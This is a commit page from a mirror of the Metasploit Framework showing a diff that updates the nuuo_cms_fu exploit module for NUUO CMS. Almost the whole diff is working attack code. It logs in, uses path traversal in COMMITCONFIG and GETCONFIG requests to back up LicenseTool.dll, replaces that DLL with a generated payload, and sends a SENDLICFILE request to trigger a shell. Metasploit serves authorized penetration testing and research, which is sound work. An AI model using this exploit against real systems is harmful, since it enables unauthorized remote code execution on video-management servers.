infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update nuuo_cms_fu 

Use the updated mixin/rex implementation
master
Jacob Robles 2019-04-23 06:28:57 -05:00
parent 80a68de17d
commit 5686319271
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 29 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
modules/exploits/windows/nuuo/nuuo_cms_fu.rb
View File

@ -76,29 +76,47 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
def exploit
nucs_login
def upload_file(filename, data)
res = ncs_send_request({
'method' => 'COMMITCONFIG',
'file_name' => "..\\..\\#{filename}",
'user_session' => user_session,
'data' => data
})
end
unless @nucs_session
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
end
def exploit
connect
res = ncs_login
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless res
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("Backing up LicenseTool.dll to #{@dll}")
dll_data = nucs_download_file('LicenseTool.dll')
nucs_upload_file(@dll, dll_data)
ltool = 'LicenseTool.dll'
res = ncs_send_request({
'method' => 'GETCONFIG',
'file_name' => "..\\..\\#{ltool}",
'user_session' => user_session
})
dll_data = res.body
upload_file(@dll, dll_data)
print_status('Uploading payload...')
nucs_upload_file('LicenseTool.dll', generate_payload_dll)
upload_file(ltool, generate_payload_dll)
print_status('Sleeping 15 seconds...')
Rex.sleep(15)
print_status('Sending SENDLICFILE request, shell incoming!')
license_data = rand_text_alpha(50..350)
nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
'Content-Length: ' + license_data.length.to_s], license_data)
res = ncs_send_request({
'method' => 'SENDLICFILE',
'file_name' => "#{rand_text_alpha(3..11)}.lic",
'user_session' => user_session,
'data' => rand_text_alpha(50..350)
})
end
end